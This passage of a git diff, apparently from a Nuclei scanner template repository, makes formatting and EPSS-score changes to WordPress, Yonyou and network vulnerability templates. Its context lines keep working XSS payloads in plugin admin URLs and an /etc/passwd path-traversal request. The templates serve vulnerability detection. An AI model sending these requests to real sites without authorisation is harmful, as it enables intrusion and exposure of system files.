4a0a00473045022062ae370ad04d5a4dbed18c620a271ae1c0a6ebd189376697a2cb1b6050b06e8a022100f17ca6802f849522d45be9917206bf0d6c546988cdb973ba9a2b2349954481a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022062ae370ad04d5a4dbed18c620a271ae1c0a6ebd189376697a2cb1b6050b06e8a022100f17ca6802f849522d45be9917206bf0d6c546988cdb973ba9a2b2349954481a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml index d8907c5af5..5978f2db4a 100644 --- a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml +++ b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml @@ -30,7 +30,6 @@ http: GET /wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"> HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -48,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c11a79365f63b581886d05763e8631981b5025ba1e0591407b6813d866adc8a0220493dc2f2db32d13085cd82e697ff5de48b8163b4aa112424fa82950b1496124f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203c11a79365f63b581886d05763e8631981b5025ba1e0591407b6813d866adc8a0220493dc2f2db32d13085cd82e697ff5de48b8163b4aa112424fa82950b1496124f:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/curcy-xss.yaml b/http/vulnerabilities/wordpress/curcy-xss.yaml index 41f5a33823..36e3c66388 100644 --- a/http/vulnerabilities/wordpress/curcy-xss.yaml +++ b/http/vulnerabilities/wordpress/curcy-xss.yaml @@ -31,7 +31,6 @@ http: GET /wp-admin/admin.php?page=wc-reports&a"> HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -47,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058e8c3b231dc1c30596fed3bc7f8d419c677b219008bd9fdba6532794ceb1664022100a619e14c084c673b3891f09ecf2e8ad918a613b48bd9a6815141b03914b6c19d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022058e8c3b231dc1c30596fed3bc7f8d419c677b219008bd9fdba6532794ceb1664022100a619e14c084c673b3891f09ecf2e8ad918a613b48bd9a6815141b03914b6c19d:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml index 5669931aca..cfdc7a08d9 100644 --- a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml +++ b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml @@ -29,7 +29,6 @@ http: GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -45,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c5c04b101504c08b89d53fabe9127f752fd732ac05d407b68d3cc887a45940b022100b6155bb17a7837ed4ec947d31a64ab9e3870bc7d3c9e1e526d0cf3212dc58fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206c5c04b101504c08b89d53fabe9127f752fd732ac05d407b68d3cc887a45940b022100b6155bb17a7837ed4ec947d31a64ab9e3870bc7d3c9e1e526d0cf3212dc58fcf:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/health-check-lfi.yaml b/http/vulnerabilities/wordpress/health-check-lfi.yaml index 80387f2ea3..7c4bc5e602 100644 --- a/http/vulnerabilities/wordpress/health-check-lfi.yaml +++ b/http/vulnerabilities/wordpress/health-check-lfi.yaml @@ -33,7 +33,6 @@ http: action=health-check-view-file-diff&file=../../../../../../etc/passwd - matchers-condition: and matchers: - type: regex @@ -49,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a3eff6cb895d68c0885251cb8d73f778c3dacd3c7ffe7abaeda769e27d108fa2022041a5af891e96a1426977f55b5175b423848e6ccbd2a492e01c5a5c2198feed3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a3eff6cb895d68c0885251cb8d73f778c3dacd3c7ffe7abaeda769e27d108fa2022041a5af891e96a1426977f55b5175b423848e6ccbd2a492e01c5a5c2198feed3c:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml index 443d5f71aa..a2a3b1a3a5 100644 --- a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml +++ b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml @@ -33,4 +33,5 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_2, "") && contains(body_2, "LDAP-authentication-intergrating-with-AD")' condition: and -# digest: 4a0a0047304502200bce04c8d9eabc4702c702560e2457a66aad41c2d00028f8eaf7ae2a87237f42022100994299926a74ebd78085b7ada4602df0bf228769319370793ad5f76739c2b7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200bce04c8d9eabc4702c702560e2457a66aad41c2d00028f8eaf7ae2a87237f42022100994299926a74ebd78085b7ada4602df0bf228769319370793ad5f76739c2b7a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml index 88ae938dd7..bcdd928197 100644 --- a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml @@ -31,7 +31,6 @@ http: GET /wp-admin/edit.php?post_type=modula-gallery&page=modula-addons&a"> HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -47,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220222b323dee099adcc3eb5538585014e21aad7c4147296e5ff6f0b40aa33ab6e3022100e625cc434cd0e6e18f6825071c2b502f273bf9b27d911699dcc9986ff40f1951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220222b323dee099adcc3eb5538585014e21aad7c4147296e5ff6f0b40aa33ab6e3022100e625cc434cd0e6e18f6825071c2b502f273bf9b27d911699dcc9986ff40f1951:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml index 39cccb5104..8f0826cb6c 100644 --- a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml +++ b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml @@ -29,7 +29,6 @@ http: GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -45,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207485fae5ad8d52cb20365611edfee072c820b6775d50644b145fdbc1cebc32f2022100c187c9ecf70302d652eec2c8e1b5407e66e3582ac845a13ef55ca5aafe4e0828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207485fae5ad8d52cb20365611edfee072c820b6775d50644b145fdbc1cebc32f2022100c187c9ecf70302d652eec2c8e1b5407e66e3582ac845a13ef55ca5aafe4e0828:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml index bb77d32e72..859c986284 100644 --- a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml +++ b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml @@ -31,7 +31,6 @@ http: GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -47,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008a5a2529577b09d4617e11dfe554c89ed74c92cbafeac72cc9fa4df8a33072520221009b1602b935bf8267a39aa8892e969d2d6b2b141fda2b50595a94d73f797e10ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008a5a2529577b09d4617e11dfe554c89ed74c92cbafeac72cc9fa4df8a33072520221009b1602b935bf8267a39aa8892e969d2d6b2b141fda2b50595a94d73f797e10ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml index c115512afd..f68973ec83 100644 --- a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml @@ -28,7 +28,6 @@ http: GET /wp-admin/plugins.php?%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -46,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008a6c98096632d6dc1db05c5e436f9db377736be364bfa916407d1e0e5245dbb9022100bba8b41bebd0091aa5f87abda6bd86a50d64b3437e3580e863356528965d23b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008a6c98096632d6dc1db05c5e436f9db377736be364bfa916407d1e0e5245dbb9022100bba8b41bebd0091aa5f87abda6bd86a50d64b3437e3580e863356528965d23b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/seatreg-redirect.yaml b/http/vulnerabilities/wordpress/seatreg-redirect.yaml index 1a4af8cb0a..fe6d940195 100644 --- a/http/vulnerabilities/wordpress/seatreg-redirect.yaml +++ b/http/vulnerabilities/wordpress/seatreg-redirect.yaml @@ -46,4 +46,5 @@ http: regex: - '"seatreg\-admin\-nonce" value="([0-9a-z]+)"' internal: true -# digest: 4b0a00483046022100de2ca36d24ece13aea8be9d0461aba69d091c9229b6a8e619d917f1eb6beca960221009ebfff983b4629eba67907d1fdbb6cfe6fa4458ba3fb171db2b7b637dd1db369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100de2ca36d24ece13aea8be9d0461aba69d091c9229b6a8e619d917f1eb6beca960221009ebfff983b4629eba67907d1fdbb6cfe6fa4458ba3fb171db2b7b637dd1db369:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml index 8b5463379a..8687c0d3be 100644 --- a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml +++ b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -38,7 +38,6 @@ http: GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -56,4 +55,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9f610278c11b7a384dcdd00480d18b6eb3dad2034ba3069bf3dcb5487f3c10e02205910a01ebfa0a8a6023865b75a5e69ae946efd370a65c624da1a86bc8cd5f720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d9f610278c11b7a384dcdd00480d18b6eb3dad2034ba3069bf3dcb5487f3c10e02205910a01ebfa0a8a6023865b75a5e69ae946efd370a65c624da1a86bc8cd5f720:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml index 3f1a9c0a58..e640852ac4 100644 --- a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml +++ b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml @@ -31,7 +31,6 @@ http: GET /wp-admin/options-general.php?page=wp-shortpixel-settings&"> HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -47,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022043e108536010f7e889341d7da235161409180741d1091096bee890daaa6ba6b4022100c3a2b8869567b389207506ed3a56e89b9ccde592cefd227ec3d4cb1d645ca632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022043e108536010f7e889341d7da235161409180741d1091096bee890daaa6ba6b4022100c3a2b8869567b389207506ed3a56e89b9ccde592cefd227ec3d4cb1d645ca632:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/watu-xss.yaml b/http/vulnerabilities/wordpress/watu-xss.yaml index 40e6ca2ed0..f94fc38471 100644 --- a/http/vulnerabilities/wordpress/watu-xss.yaml +++ b/http/vulnerabilities/wordpress/watu-xss.yaml @@ -34,4 +34,5 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "watu")' condition: and -# digest: 4a0a0047304502201ceabcd5477eda1c4a71b188a0c3510279f588efe3b4174a73455670afa9cb9b0221008a870a2a58a48d0e1a91da34ed2e51d0c24cbc505f3de54577d749f41e60f349:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201ceabcd5477eda1c4a71b188a0c3510279f588efe3b4174a73455670afa9cb9b0221008a870a2a58a48d0e1a91da34ed2e51d0c24cbc505f3de54577d749f41e60f349:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml index db442dcf46..e9af3631dc 100644 --- a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml +++ b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml @@ -30,7 +30,6 @@ http: GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=documents§ion=invoice&"> HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -48,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c44027d8ad4b3f1c4e5106bf9904181945230734317c9b5405ca2bb3efa5790b02202158f36f5d54676a4185f5106773af5a458c3f9527d33f60716477115b36012e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c44027d8ad4b3f1c4e5106bf9904181945230734317c9b5405ca2bb3efa5790b02202158f36f5d54676a4185f5106773af5a458c3f9527d33f60716477115b36012e:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml b/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml index f74488b773..c842f60996 100644 --- a/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml @@ -18,7 +18,6 @@ http: - "{{BaseURL}}" - "{{BaseURL}}/wp-cron.php" - matchers-condition: and matchers: - type: dsl @@ -37,4 +36,5 @@ http: - "len(body_2) == 0" - "status_code_2 == 200" - "contains(content_type_2, 'text/html')" -# digest: 4a0a00473045022100c46761e40f9fc54f23eb2fba795a80a6ae6b1dd26c7bce0d2f0a7871daa32c21022039128b21c4a3c28fe92dbf20659bcfb87ed82471267439b02ac1c51aeae89376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c46761e40f9fc54f23eb2fba795a80a6ae6b1dd26c7bce0d2f0a7871daa32c21022039128b21c4a3c28fe92dbf20659bcfb87ed82471267439b02ac1c51aeae89376:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml index 9576eb780a..b3d28da432 100644 --- a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml @@ -30,7 +30,6 @@ http: GET /wp-admin/admin.php?page=pmxe-admin-manage&a"> HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -48,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008baffaf124613c1e70fee4037031b716c7dc691abbe299407f67db7a39d36c2c02202be81409638214908e28745adbb6ef059627be2afc37d2048244b5eb440b9e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008baffaf124613c1e70fee4037031b716c7dc691abbe299407f67db7a39d36c2c02202be81409638214908e28745adbb6ef059627be2afc37d2048244b5eb440b9e45:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml index 933226415b..507ca5c681 100644 --- a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml @@ -29,7 +29,6 @@ http: GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -48,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ef5a3a4d5254686f4da3d33cc84ba5f2467e9c0a45cfd73f0ed813175f357a9022100cbd490059e41391a68fa729d13fa5bd4bcbf9a20a48082f6207d8b282ecaf5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200ef5a3a4d5254686f4da3d33cc84ba5f2467e9c0a45cfd73f0ed813175f357a9022100cbd490059e41391a68fa729d13fa5bd4bcbf9a20a48082f6207d8b282ecaf5af:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml index 50ca6d4223..591e82ef40 100644 --- a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml @@ -30,7 +30,6 @@ http: GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"> HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -48,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220631174c5bd99e3c1677e1a3f672d7edbde19896c5b3da3374412763b0edb44c402201e192a012dea3aa5e416b913881336512efd403495d46fcaacdede24426c67d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220631174c5bd99e3c1677e1a3f672d7edbde19896c5b3da3374412763b0edb44c402201e192a012dea3aa5e416b913881336512efd403495d46fcaacdede24426c67d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wp-related-post-xss.yaml b/http/vulnerabilities/wordpress/wp-related-post-xss.yaml index a7a448b084..535baa561a 100644 --- a/http/vulnerabilities/wordpress/wp-related-post-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-related-post-xss.yaml @@ -26,7 +26,6 @@ http: GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -44,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f6fb4a3c307858487dd4e87976d51b2b0a126736bfe71ab17719dae2894102e022060223aa5933f4b4f5d8ad98d5659ef90fead74ddd670889852fa3f208665a0ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203f6fb4a3c307858487dd4e87976d51b2b0a126736bfe71ab17719dae2894102e022060223aa5933f4b4f5d8ad98d5659ef90fead74ddd670889852fa3f208665a0ed:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wptouch-xss.yaml b/http/vulnerabilities/wordpress/wptouch-xss.yaml index 26b678443d..43de6032e7 100644 --- a/http/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/http/vulnerabilities/wordpress/wptouch-xss.yaml @@ -29,7 +29,6 @@ http: GET /wp-admin/admin.php?page=wptouch-admin-license&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -53,4 +52,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbfbd9906724d016198d54f5669855d519ed8230fda1404e8a044f39a2dd998002205b069f50f5a4affb80e72e49543f249a69662cc5e58814b38ce5666d30402024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bbfbd9906724d016198d54f5669855d519ed8230fda1404e8a044f39a2dd998002205b069f50f5a4affb80e72e49543f249a69662cc5e58814b38ce5666d30402024:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml index 35c84ae8b6..a478c4ec66 100755 --- a/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml +++ b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml @@ -45,4 +45,5 @@ http: - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" condition: and -# digest: 4a0a00473045022065622d9010a0899491ee909d944835b79a8f75e3a0c1843f5ab636b5353d1e8202210088c9c21a362c6f95b9c6fb4be62080f324980f636a36dfc0691d6519314d87da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022065622d9010a0899491ee909d944835b79a8f75e3a0c1843f5ab636b5353d1e8202210088c9c21a362c6f95b9c6fb4be62080f324980f636a36dfc0691d6519314d87da:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml index c9a0a61ef6..6716dde40d 100755 --- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml @@ -36,4 +36,5 @@ http: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2, '{{file_content}}')" condition: and -# digest: 4b0a00483046022100bcdd65a14f3b8e796052630e724be45467f76197107285966d6a7a61f9458843022100f885cd8e13691c8579d864cf24aa7101fdc0fbc2971b636556270d61a131073c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bcdd65a14f3b8e796052630e724be45467f76197107285966d6a7a61f9458843022100f885cd8e13691c8579d864cf24aa7101fdc0fbc2971b636556270d61a131073c:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml index ab2d362f99..996b6b2dca 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml @@ -46,4 +46,5 @@ http: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" condition: and -# digest: 490a004630440220518a3baba6f10679a1b190066ccde7721347a5e9e36904c65a310b4befa16f540220205f5d9c798bc4541567cf6711292cda00347b9e7c916d888fdff343e6cec6da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220518a3baba6f10679a1b190066ccde7721347a5e9e36904c65a310b4befa16f540220205f5d9c798bc4541567cf6711292cda00347b9e7c916d888fdff343e6cec6da:922c64590222798bb761d5b6d8e72950 diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml index 4b4d829ab2..1cdd1740f4 100644 --- a/javascript/cves/2016/CVE-2016-8706.yaml +++ b/javascript/cves/2016/CVE-2016-8706.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-8706 cwe-id: CWE-190 epss-score: 0.90293 - epss-percentile: 0.98505 + epss-percentile: 0.98508 cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml index 5031f3a0f2..ce444cad20 100644 --- a/javascript/cves/2023/CVE-2023-34039.yaml +++ b/javascript/cves/2023/CVE-2023-34039.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2023-34039 cwe-id: CWE-327 epss-score: 0.92573 - epss-percentile: 0.98748 + epss-percentile: 0.9875 cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/javascript/enumeration/smb-enum.yaml b/javascript/enumeration/smb-enum.yaml index 37ecd4b433..0783cc2690 100644 --- a/javascript/enumeration/smb-enum.yaml +++ b/javascript/enumeration/smb-enum.yaml @@ -14,18 +14,15 @@ info: max-request: 1 shodan-query: port:445 tags: js,network,smb,enum - javascript: - code: | var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); to_json(response); - args: Host: "{{Host}}" Port: "445" - matchers: - type: dsl dsl: @@ -81,4 +78,5 @@ javascript: - '"DNSComputerNamen: "+ .DNSComputerName ' - '"DNSComputerName: "+ .DNSComputerName ' - '"ForestName: "+ .ForestName' -# digest: 4a0a00473045022100c8feb299fcc16548780151b7bbda339583d71d208f3b7d496ab1411eaf8556f602207f62866f66f88a587509662f561db6d7e6659c48d3e2a0560fa1d71fbadd7c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c8feb299fcc16548780151b7bbda339583d71d208f3b7d496ab1411eaf8556f602207f62866f66f88a587509662f561db6d7e6659c48d3e2a0560fa1d71fbadd7c79:922c64590222798bb761d5b6d8e72950 diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index d9e3b61124..69cbeb3c77 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31793 cwe-id: CWE-22 epss-score: 0.22965 - epss-percentile: 0.96054 + epss-percentile: 0.96051 cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* metadata: verified: true